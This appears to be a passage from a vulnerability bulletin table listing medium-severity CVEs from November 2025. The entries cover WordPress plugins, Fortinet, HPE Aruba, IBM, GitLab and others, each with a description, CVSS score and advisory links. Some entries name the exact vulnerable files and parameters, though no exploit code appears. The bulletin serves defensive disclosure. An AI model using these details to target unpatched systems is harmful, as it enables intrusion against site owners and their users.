| everviz--everviz Charts, Maps and Tables Interactive and responsive | The everviz plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `everviz` shortcode attributes in versions up to, and including, 1.1. This is due to the plugin not properly sanitizing user input or escaping output when building a `<div id=...>` from the `type` and `hash` attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-18 | 6.4 | CVE-2025-11868 | https://www.wordfence.com/threat-intel/vulnerabilities/id/f3b265d9-dddd-4cf7-8d1a-980fdd17777d?source=cve https://plugins.trac.wordpress.org/browser/everviz/tags/1.0/highcharts-editor.php#L136   |
| f1logic--WP Twitter Auto Publish | The WP Twitter Auto Publish plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PostMessage in all versions up to, and including, 1.7.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-18 | 6.1 | CVE-2025-12079 | https://www.wordfence.com/threat-intel/vulnerabilities/id/562456ac-a113-4b3d-bc5d-6dedde635d5e?source=cve https://wordpress.org/plugins/twitter-auto-publish/   |
| Facebook--WhatsApp Business for iOS | Incomplete validation of rich response messages in WhatsApp for iOS prior to v2.25.23.73, WhatsApp Business for iOS v2.25.23.82, and WhatsApp for Mac v2.25.23.83 could have allowed a user to trigger processing of media content from an arbitrary URL on another user's device. We have not seen evidence of exploitation in the wild. | 2025-11-18 | 5.4 | CVE-2025-55179 | https://www.facebook.com/security/advisories/cve-2025-55179 https://www.whatsapp.com/security/advisories/2025/   |
| farvehandleren--Custom Post Type | The Custom Post Type plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0. This is due to missing nonce validation on the custom post type deletion functionality. This makes it possible for unauthenticated attackers to delete custom post types via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-21 | 4.3 | CVE-2025-13142 | https://www.wordfence.com/threat-intel/vulnerabilities/id/48fefbd5-d872-4f47-8696-d73fbc9133ed?source=cve https://plugins.trac.wordpress.org/browser/custom-post-type/tags/1.0/cupta-dmin.php#L29   |
| fastmover--Shortcodes Bootstrap | The Shortcodes Bootstrap plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'type' parameter in the [notification] shortcode in all versions up to, and including, 1.1. This is due to missing input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11764 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d9363db7-4535-427d-a6ae-2580f215b965?source=cve https://plugins.trac.wordpress.org/browser/shortcodes-bootstrap/trunk/inc/dws_alert.php#L16   |
| Fortinet--FortiADC | An Out-of-bounds Write vulnerability [CWE-787] in FortiADC 8.0.0, 7.6.0 through 7.6.2, 7.4.0 through 7.4.7, 7.2 all versions, 7.1 all versions, 7.0 all versions, 6.2 all versions may allow an authenticated attacker to execute arbitrary code via specially crafted HTTP requests. | 2025-11-18 | 6.3 | CVE-2025-48839 | https://fortiguard.fortinet.com/psirt/FG-IR-25-225   |
| Fortinet--FortiADC | An improper neutralization of script-related HTML tags in a web page (basic XSS) vulnerability in Fortinet FortiADC 8.0.0, FortiADC 7.6.0 through 7.6.3, FortiADC 7.4 all versions, FortiADC 7.2 all versions may allow an attacker to execute unauthorized code or commands via a crafted URL. | 2025-11-19 | 4.2 | CVE-2025-58412 | https://fortiguard.fortinet.com/psirt/FG-IR-25-736   |
| Fortinet--FortiClientWindows | An active debug code vulnerability in Fortinet FortiClientWindows 7.4.0 through 7.4.3, FortiClientWindows 7.2.0 through 7.2.10, FortiClientWindows 7.0 all versions may allow a local attacker to run the application step by step and retrieve the saved VPN user password. | 2025-11-18 | 4.9 | CVE-2025-54660 | https://fortiguard.fortinet.com/psirt/FG-IR-25-844   |
| Fortinet--FortiExtender | A buffer copy without checking size of input ('classic buffer overflow') in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to execute arbitrary code or commands via crafted CLI commands. | 2025-11-18 | 6.3 | CVE-2025-46776 | https://fortiguard.fortinet.com/psirt/FG-IR-25-251   |
| Fortinet--FortiExtender | A debug messages revealing unnecessary information vulnerability in Fortinet FortiExtender 7.6.0 through 7.6.1, FortiExtender 7.4.0 through 7.4.6, FortiExtender 7.2 all versions, FortiExtender 7.0 all versions may allow an authenticated user to obtain administrator credentials via debug log commands. | 2025-11-18 | 5.2 | CVE-2025-46775 | https://fortiguard.fortinet.com/psirt/FG-IR-25-259   |
| Fortinet--FortiOS | A stack-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions allows an attacker to execute unauthorized code or commands via specially crafted packets. | 2025-11-18 | 6.9 | CVE-2025-53843 | https://fortiguard.fortinet.com/psirt/FG-IR-25-358   |
| Fortinet--FortiSandbox | An Improper Isolation or Compartmentalization vulnerability [CWE-653] in Fortinet FortiSandbox 5.0.0 through 5.0.1, FortiSandbox 4.4.0 through 4.4.7, FortiSandbox 4.2 all versions, FortiSandbox 4.0 all versions may allow an unauthenticated attacker to evade the sandboxing scan via a crafted file. | 2025-11-18 | 5 | CVE-2025-46215 | https://fortiguard.fortinet.com/psirt/FG-IR-24-501   |
| Fortinet--FortiSASE | A stack-based buffer overflow vulnerability in Fortinet FortiOS 7.6.0 through 7.6.3, FortiOS 7.4.0 through 7.4.8, FortiOS 7.2 all versions, FortiOS 7.0 all versions, FortiOS 6.4 all versions, FortiOS 6.2 all versions, FortiOS 6.0 all versions, FortiSASE 25.3.b allows an attacker to execute unauthorized code or commands via specially crafted packets. | 2025-11-18 | 6.9 | CVE-2025-58413 | https://fortiguard.fortinet.com/psirt/FG-IR-25-632   |
| Fortinet--FortiWeb | An Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability [CWE-78] in Fortinet FortiWeb 8.0.0 through 8.0.1, FortiWeb 7.6.0 through 7.6.5, FortiWeb 7.4.0 through 7.4.10, FortiWeb 7.2.0 through 7.2.11, FortiWeb 7.0.0 through 7.0.11 may allow an authenticated attacker to execute unauthorized code on the underlying system via crafted HTTP requests or CLI commands. | 2025-11-18 | 6.7 | CVE-2025-58034 | https://fortiguard.fortinet.com/psirt/FG-IR-25-513   |
| Fortinet--FortiWeb | A use of hard-coded credentials vulnerability in Fortinet FortiWeb 7.6.0, FortiWeb 7.4 all versions, FortiWeb 7.2 all versions, FortiWeb 7.0 all versions may allow an authenticated attacker with shell access to the device to connect to the redis service and access its data. | 2025-11-18 | 4.8 | CVE-2025-59669 | https://fortiguard.fortinet.com/psirt/FG-IR-25-843   |
| fpcorso--Tips Shortcode | The Tips Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tip' shortcode in all versions up to, and including, 0.2.1. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-11767 | https://www.wordfence.com/threat-intel/vulnerabilities/id/34c13495-23c3-4b07-9bfb-678723daa43f?source=cve https://plugins.trac.wordpress.org/browser/tips-shortcode/tags/0.2.1/tips_shortcode.php#L33   |
| Gallagher--HBUS Devices | Observable Timing Discrepancy (CWE-208) in HBUS devices may allow an attacker with physical access to the device to extract device-specific keys, potentially compromising further site security. This issue affects Command Centre Server: 9.30 prior to vCR9.30.251028a (distributed in 9.30.2881 (MR3)), 9.20 prior to vCR9.20.251028a (distributed in 9.20.3265 (MR5)), 9.10 prior to vCR9.10.251028a (distributed in 9.10.4135 (MR8)), all versions of 9.00 and prior. | 2025-11-18 | 5.7 | CVE-2025-52457 | https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-52457   |
| Gallagher--High Sec End of Line Module | Incorrect Usage of Seeds in Pseudo-Random Number Generator (CWE-335) vulnerability in the High Sec ELM may allow a sophisticated attacker with physical access to compromise internal device communications. This issue affects Command Centre Server: 9.30 prior to vCR9.30.251028a (distributed in 9.30.2881 (MR3)), 9.20 prior to vCR9.20.251028a (distributed in 9.20.3265 (MR5)), 9.10 prior to vCR9.10.251028a (distributed in 9.10.4135 (MR8)), all versions of 9.00 and prior. | 2025-11-18 | 5.7 | CVE-2025-52578 | https://security.gallagher.com/en-NZ/Security-Advisories/CVE-2025-52578   |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.7 to 18.2.8, 18.3 before 18.3.4, and 18.4 before 18.4.2 that could have allowed authenticated users without project membership to view sensitive manual CI/CD variables by querying the GraphQL API. | 2025-11-21 | 5 | CVE-2025-9825 | https://about.gitlab.com/releases/2025/10/08/patch-release-gitlab-18-4-2-released/ GitLab Issue #567301 HackerOne Bug Bounty Report #3319800   |
| gn_themes--WP Shortcodes Plugin Shortcodes Ultimate | The WP Shortcodes Plugin - Shortcodes Ultimate plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 7.4.5 via the su_shortcode_csv_table function. This makes it possible for authenticated attackers, with Administrator-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services. If the 'Unsafe features' option is explicitly enabled by an administrator, this issue becomes exploitable by Contributor+ attackers. | 2025-11-23 | 6.4 | CVE-2025-12800 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5cbb7db4-bef7-4799-9b65-ebe77976e21c?source=cve https://plugins.trac.wordpress.org/changeset/3397946/   |
| goauthentik--authentik | authentik is an open-source Identity Provider. Prior to versions 2025.8.5 and 2025.10.2, invitations were considered valid regardless of whether they had expired, so expiry relied on background tasks cleaning expired invitations up. In a normal scenario this can take up to 5 minutes because the cleanup of expired objects is scheduled to run every 5 minutes. However, with a large amount of tasks in the backlog, this might take longer. authentik versions 2025.8.5 and 2025.10.2 fix this issue. A workaround involves creating a policy that explicitly checks whether the invitation is still valid, binding it to the invitation stage on the invitation flow, and denying access if the invitation is not valid. | 2025-11-19 | 5.8 | CVE-2025-64708 | https://github.com/goauthentik/authentik/security/advisories/GHSA-ch7q-53v8-73pc https://github.com/goauthentik/authentik/commit/6672e6aaa41e0f2c9bfb1e4d8b51cf114969e830   |
| goauthentik--authentik | authentik is an open-source Identity Provider. Prior to versions 2025.8.5 and 2025.10.2, when authenticating with client_id and client_secret to an OAuth provider, authentik creates a service account for the provider. In previous authentik versions, authentication for this account was possible even when the account was deactivated. Other permissions are correctly applied, and federation with other providers still takes assigned policies correctly into account. authentik versions 2025.8.5 and 2025.10.2 fix this issue. A workaround involves adding a policy to the application that explicitly checks whether the service account is still valid, and denying access if not. | 2025-11-19 | 4.8 | CVE-2025-64521 | https://github.com/goauthentik/authentik/security/advisories/GHSA-xr73-jq5p-ch8r https://github.com/goauthentik/authentik/commit/9dbdfc3f1be0f1be36f8efce2442897b2a54a71c   |
| HashiCorp--Terraform Enterprise | Terraform state versions can be created by a user with specific but insufficient permissions in a Terraform Enterprise workspace. This may allow for the alteration of infrastructure if a subsequent plan operation is approved by a user with approval permission or auto-applied. This vulnerability, CVE-2025-13432, is fixed in Terraform Enterprise version 1.1.1 and 1.0.3. | 2025-11-21 | 4.3 | CVE-2025-13432 | https://discuss.hashicorp.com/t/hcsec-2025-34-terraform-enterprise-state-versions-can-be-created-by-users-without-sufficient-write-access/76821   |
| HCL Software--Glovius Cloud | A Cross-Site Request Forgery (CSRF) vulnerability was identified in HCL Glovius Cloud. An attacker can force a user's web browser to execute an unwanted, malicious action on a trusted site where the user is authenticated, specifically on one endpoint. | 2025-11-20 | 6.8 | CVE-2025-62346 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0126459   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A command injection vulnerability exists in the AOS-CX Operating System. Successful exploitation could allow an authenticated remote attacker to conduct a Remote Code Execution (RCE) on the affected system. | 2025-11-18 | 6.7 | CVE-2025-37157 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking 100 Series Cellular Bridge | A vulnerability in the command line interface of affected devices could allow an authenticated remote attacker to conduct a command injection attack. Successful exploitation could allow an attacker to execute arbitrary commands on the underlying operating system. | 2025-11-18 | 6.5 | CVE-2025-37162 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04970en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A platform-level denial-of-service (DoS) vulnerability exists in ArubaOS-CX software. Successful exploitation of this vulnerability could allow an attacker with administrative access to execute specific code that renders the switch non-bootable and effectively non-functional. | 2025-11-18 | 6.8 | CVE-2025-37156 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A command injection vulnerability exists in the AOS-CX Operating System. Successful exploitation could allow an authenticated remote attacker to conduct a Remote Code Execution (RCE) on the affected system. | 2025-11-18 | 6.7 | CVE-2025-37158 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A vulnerability in the web management interface of the AOS-CX OS user authentication service could allow an authenticated remote attacker to hijack an active user session. Successful exploitation may enable the attacker to maintain unauthorized access to the session, potentially leading to the view or modification of sensitive configuration data. | 2025-11-18 | 5.8 | CVE-2025-37159 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| Hewlett Packard Enterprise (HPE)--HPE Aruba Networking AOS-CX | A broken access control (BAC) vulnerability in the web-based management interface could allow an authenticated remote attacker with low privileges to view sensitive information. Successful exploitation of this vulnerability could enable the attacker to disclose sensitive data. | 2025-11-18 | 5.3 | CVE-2025-37160 | https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04888en_us&docLocale=en_US   |
| humanityco--Cookie Notice & Compliance for GDPR / CCPA | The Cookie Notice & Compliance for GDPR / CCPA plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cookies_accepted shortcode in all versions up to, and including, 2.5.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-22 | 6.4 | CVE-2025-11186 | https://www.wordfence.com/threat-intel/vulnerabilities/id/19700658-1bef-4e85-a995-d86fff508cdf?source=cve https://plugins.trac.wordpress.org/browser/cookie-notice/tags/2.5.7/cookie-notice.php#L1060 https://plugins.trac.wordpress.org/browser/cookie-notice/tags/2.5.7/cookie-notice.php#L1181   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 is vulnerable to cross-site scripting. This vulnerability allows an unauthenticated attacker to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. | 2025-11-20 | 6.1 | CVE-2025-36153 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 could allow a local user to forge log files to impersonate other users or hide their identity due to improper neutralization of output. | 2025-11-20 | 6.2 | CVE-2025-36159 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 could allow a local user with specific permission to obtain sensitive information from files due to uncontrolled recursive directory copying. | 2025-11-20 | 5.1 | CVE-2025-36158 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 could disclose sensitive server information from HTTP response headers that could aid in further attacks against the system. | 2025-11-20 | 5.3 | CVE-2025-36160 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--Concert | IBM Concert 1.0.0 through 2.0.0 could allow a remote attacker to obtain sensitive information, caused by the failure to properly enable HTTP Strict-Transport-Security. An attacker could exploit this vulnerability to obtain sensitive information using man in the middle techniques. | 2025-11-20 | 5.9 | CVE-2025-36161 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--i | IBM i 7.2, 7.3, 7.4, 7.5, and 7.6 are impacted by an information disclosure vulnerability in the database plan cache implementation. A user with access to the database plan cache could see information they do not have authority to view. | 2025-11-19 | 6.5 | CVE-2025-36371 | https://www.ibm.com/support/pages/node/7251699   |
| IBM--IBM Concert Software | IBM Concert Software 1.0.0 through 2.0.0 could allow a remote attacker to hijack the clicking action of the victim. | 2025-11-21 | 6.3 | CVE-2025-36149 | https://www.ibm.com/support/pages/node/7252019   |
| IBM--IBM Planning Analytics Local | IBM Planning Analytics Local 2.1.0 through 2.1.14 stores sensitive information in source code that could be used in further attacks against the system. | 2025-11-17 | 4.3 | CVE-2025-36299 | https://www.ibm.com/support/pages/node/7251265   |
| iCam365--P201 | The affected product allows unauthenticated access to Real Time Streaming Protocol (RTSP) services, which may allow an attacker unauthorized access to camera configuration information. | 2025-11-20 | 6.8 | CVE-2025-62674 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-02 https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-02.json https://icam365.net/en/aboutUs/   |
| iCam365--P201 | The affected products allow unauthenticated access to Open Network Video Interface Forum (ONVIF) services, which may allow an attacker unauthorized access to camera configuration information. | 2025-11-20 | 6.8 | CVE-2025-64770 | https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-02 https://icam365.net/en/aboutUs/ https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-02.json   |
| icegram--Email Subscribers & Newsletters Powerful Email Marketing, Post Notification & Newsletter Plugin for WordPress & WooCommerce | The Icegram Express - Email Subscribers, Newsletters and Marketing Automation Plugin for WordPress is vulnerable to missing authorization in versions up to, and including, 5.9.10. This is due to the plugin not properly verifying that a user is authorized to perform an action in the `trigger_mailing_queue_sending` function. This makes it possible for unauthenticated attackers to force immediate email sending, bypass the schedule, increase server load, and change plugin state (e.g., last-cron-hit), enabling abuse or DoS-like effects. | 2025-11-19 | 5.3 | CVE-2025-12349 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0b4cbe21-9f1b-425b-8141-ae075baaf717?source=cve https://plugins.trac.wordpress.org/browser/email-subscribers/tags/5.9.4/lite/includes/classes/class-es-queue.php#L54 https://plugins.trac.wordpress.org/browser/email-subscribers/tags/5.9.4/lite/includes/classes/class-es-queue.php#L1132 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3394838%40email-subscribers%2Ftrunk&old=3393565%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=   |
| ideastocode--Enable SVG, WebP, and ICO Upload | The Enable SVG, WebP, and ICO Upload plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. | 2025-11-18 | 6.4 | CVE-2025-12457 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d5f267a5-012d-4b9a-a59d-9eccb04c557a?source=cve https://plugins.trac.wordpress.org/browser/enable-svg-webp-ico-upload/tags/1.1.2/includes/class-svg.php#L21   |
| integrationshotelrunner--HotelRunner Booking Widget | The HotelRunner Booking Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hotelrunner' shortcode in all versions up to, and including, 5.2.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-11-21 | 6.4 | CVE-2025-13135 | https://www.wordfence.com/threat-intel/vulnerabilities/id/df2854c4-5d57-4c39-a28f-41dab36a086e?source=cve https://wordpress.org/plugins/hotelrunner/#developers   |
| interledger--Coil Web Monetization | The Coil Web Monetization plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.0.2. This is due to missing or incorrect nonce validation on the coil-get-css-selector parameter handling in the maybe_restrict_content function. This makes it possible for unauthenticated attackers to trigger CSS selector detection functionality via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2025-11-18 | 4.3 | CVE-2025-9625 | https://www.wordfence.com/threat-intel/vulnerabilities/id/4aa4cb93-7af3-4427-a17f-160b27fcebb8?source=cve https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/functions.php#L48 https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/gating/functions.php#L202 https://plugins.trac.wordpress.org/browser/coil-web-monetization/tags/2.0.2/includes/gating/functions.php#L195   |
| Iqbolshoh--php-business-website | A security vulnerability has been detected in Iqbolshoh php-business-website up to 10677743a8dfc281f85291a27cf63a0bce043c24. This affects an unknown part of the file /admin/about.php. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used. This product is using a rolling release to provide continuous delivery. Therefore, no version details for affected nor updated releases are available. | 2025-11-17 | 4.7 | CVE-2025-13275 | VDB-332610 \| Iqbolshoh php-business-website about.php unrestricted upload VDB-332610 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690049 \| php-business-website web 1 Unrestricted Upload https://github.com/mhszed/Report/blob/main/php-business-website%20upload.docx   |
| itsourcecode--COVID Tracking System | A vulnerability was detected in itsourcecode COVID Tracking System 1.0. This affects an unknown function of the file /admin/?page=establishment. The manipulation of the argument ID results in sql injection. It is possible to launch the attack remotely. The exploit is now public and may be used. | 2025-11-23 | 6.3 | CVE-2025-13567 | VDB-333331 \| itsourcecode COVID Tracking System page sql injection VDB-333331 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #698116 \| itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/Abxery/cveee/issues/9 https://itsourcecode.com/   |
| itsourcecode--COVID Tracking System | A flaw has been found in itsourcecode COVID Tracking System 1.0. This impacts an unknown function of the file /admin/?page=people. This manipulation of the argument ID causes sql injection. The attack can be initiated remotely. The exploit has been published and may be used. | 2025-11-23 | 6.3 | CVE-2025-13568 | VDB-333332 \| itsourcecode COVID Tracking System page sql injection VDB-333332 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #698117 \| itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/Abxery/cveee/issues/10 https://itsourcecode.com/   |
| itsourcecode--COVID Tracking System | A vulnerability has been found in itsourcecode COVID Tracking System 1.0. Affected is an unknown function of the file /admin/?page=city. Such manipulation of the argument ID leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2025-11-23 | 6.3 | CVE-2025-13569 | VDB-333333 \| itsourcecode COVID Tracking System page sql injection VDB-333333 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #698655 \| itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/58 https://itsourcecode.com/   |
| itsourcecode--COVID Tracking System | A vulnerability was found in itsourcecode COVID Tracking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/?page=state. Performing manipulation of the argument ID results in sql injection. The attack may be initiated remotely. The exploit has been made public and could be used. | 2025-11-23 | 6.3 | CVE-2025-13570 | VDB-333334 \| itsourcecode COVID Tracking System page sql injection VDB-333334 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #698656 \| itsourcecode COVID Tracking System V1.0 SQL Injection https://github.com/yihaofuweng/cve/issues/59 https://itsourcecode.com/   |
| itsourcecode--Online Voting System | A security flaw has been discovered in itsourcecode Online Voting System 1.0. The impacted element is an unknown function of the file /ajax.php?action=save_user. Performing manipulation of the argument ID results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. | 2025-11-17 | 6.3 | CVE-2025-13286 | VDB-332626 \| itsourcecode Online Voting System ajax.php sql injection VDB-332626 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690888 \| itsourcecode Online Voting System V1.0 SQL Injection https://github.com/WANGshuyan2025/cve/issues/8 https://itsourcecode.com/   |
| itsourcecode--Online Voting System | A weakness has been identified in itsourcecode Online Voting System 1.0. This affects an unknown function of the file /index.php?page=categories. Executing manipulation of the argument id/category can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. | 2025-11-17 | 6.3 | CVE-2025-13287 | VDB-332627 \| itsourcecode Online Voting System index.php sql injection VDB-332627 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #690889 \| itsourcecode Online Voting System V1.0 SQL Injection Submit #690891 \| itsourcecode Online Voting System V1.0 SQL Injection (Duplicate) https://github.com/WANGshuyan2025/cve/issues/9 https://itsourcecode.com/   |
| itsourcecode--Student Information System | A vulnerability was determined in itsourcecode Student Information System 1.0. The affected element is an unknown function of the file /enrollment_edit1.php. Executing manipulation of the argument en_id can lead to sql injection. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2025-11-18 | 6.3 | CVE-2025-13325 | VDB-332669 \| itsourcecode Student Information System enrollment_edit1.php sql injection VDB-332669 \| CTI Indicators (IOB, IOC, TTP, IOA) Submit #691929 \| itsourcecode Student Information System V1.0 SQL Injection https://github.com/chenxiyue-2006/CVE/issues/1 https://itsourcecode.com/   |
| itvn9online--EchBay Admin Security | The EchBay Admin Security plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_ebnonce' parameter in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-11-21 | 6.1 | CVE-2025-11885 | https://www.wordfence.com/threat-intel/vulnerabilities/id/6e7bd966-9a98-4192-83d9-e1682ec00a02?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3398386%40echbay-admin-security&new=3398386%40echbay-admin-security&sfp_email=&sfph_mail=   |
| jameschz--Hush Framework | A weakness has been identified in jameschz Hush Framework 2.0. The impacted element is an unknown function of the file Hush\hush-lib\hush\Util.php of the component HTTP Host Header Handler. This manipulation of the argument $_SERVER['HOST'] causes improper neutralization of http headers for scripting syntax. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-11-20 | 5.3 | CVE-2025-13434 | VDB-332978 \| jameschz Hush Framework HTTP Host Header Util.php http headers for scripting syntax VDB-332978 \| CTI Indicators (IOB, IOC, IOA) Submit #687568 \| jameschz Hush 2.0 Improper Neutralization of HTTP Headers for Scripting Syntax https://github.com/lakshayyverma/CVE-Discovery/blob/main/hush.md   |
| jcollings--Import WP Export and Import CSV and XML files to WordPress | The Import WP - Export and Import CSV and XML files to WordPress plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.14.17 via the import/export functionality and a lack of .htaccess protection. This makes it possible for unauthenticated attackers to extract sensitive data from exports stored in /exportwp and import data stored in /importwp. | 2025-11-21 | 5.3 | CVE-2025-12894 | https://www.wordfence.com/threat-intel/vulnerabilities/id/28ca9590-dc0b-40c9-9de6-1480094ea8be?source=cve https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394624%40jc-importer&new=3394624%40jc-importer&sfp_email=&sfph_mail=   |
| johnjamesjacoby--Post Type Switcher | The Post Type Switcher plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 4.0.0 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to modify the post type of arbitrary posts and pages they do not own, including those created by administrators, which can lead to site disruption, broken navigation, and SEO impact. | 2025-11-18 | 5.4 | CVE-2025-12524 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d875514c-c7d3-4236-842b-6e772048448d?source=cve https://plugins.trac.wordpress.org/browser/post-type-switcher/tags/4.0.0/post-type-switcher.php#L469 https://plugins.trac.wordpress.org/browser/post-type-switcher/tags/4.0.0/post-type-switcher.php#L486 https://cwe.mitre.org/data/definitions/639.html https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3391983%40post-type-switcher%2Ftrunk&old=3331072%40post-type-switcher%2Ftrunk&sfp_email=&sfph_mail=   |
| Kaspersky--Kaspersky Endpoint Security | Kaspersky has fixed a security issue in Kaspersky Endpoint Security for Linux (any version with anti-virus databases prior to 18.11.2025), Kaspersky Industrial CyberSecurity for Linux Nodes (any version with anti-virus databases prior to 18.11.2025), and Kaspersky Endpoint Security for Mac (12.0.0.325, 12.1.0.553, and 12.2.0.694 with anti-virus databases prior to 18.11.2025) that could have allowed a reflected XSS attack to be carried out by an attacker using phishing techniques. | 2025-11-20 | 6.1 | CVE-2025-64984 | Advisory issued on November 18, 2025   |
